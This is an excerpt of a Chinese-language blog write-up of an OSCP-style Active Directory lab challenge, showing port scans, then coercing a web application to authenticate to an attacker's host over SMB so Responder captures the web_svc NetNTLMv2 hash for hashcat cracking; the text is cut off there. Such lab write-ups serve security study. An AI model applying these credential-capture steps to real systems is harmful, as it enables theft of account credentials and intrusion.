發表文章

目前顯示的是有「network path」標籤的文章

Challenge 5 - AD

圖片
 Challenge 5 -  AD 先掃對外的機器,└─$ rustscan -a 192.168.230.147 --scripts none --ulimit 5000 | tee rustscan 192.168.230.147 -> [22,21,135,139,445,5040,5985,8000,8080,8443,47001,49664,49665,49667,49666,49668,49669,49670,49671] Port 服務資訊,└─$ sudo nmap -sCV -p 21,22,135,139,445,5040,5985,8000,8080,8443,47001,49664,49665,49667,49666,49668,49669,49670,49671 192.168.230.147 | tee nmap 值得注意的是掃了這麼多靶機,這是第一台有使用憑證的機器,掃描資訊如下 8443/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 | ssl-cert: Subject: commonName=MS01.oscp.exam 可以看到主體名稱是 MS01.oscp.exam,讓我們改一下 HOSTs 連線看一下 https://ms01.oscp.exam:8443 透過 command injection 等 SQL injection 都沒有反應,但當中的 URL 測試時發現慧真的去連線輸入的網址,所以這時候改透過輸入 SMB 網路磁碟機的方式試試看 先在 kali 啟動 responder, sudo responder -I tun0 可以參考這一篇  https://your-it-note.blogspot.com/2023/09/net-ntlmv2.html 送出 kali 主機的不存在路徑 \\192.168.45.232\test 試試看 收到帳號 web_svc 的 NetNTLMv2 的驗證進來了 HASH 存檔後進行破解,└─$ hashcat ...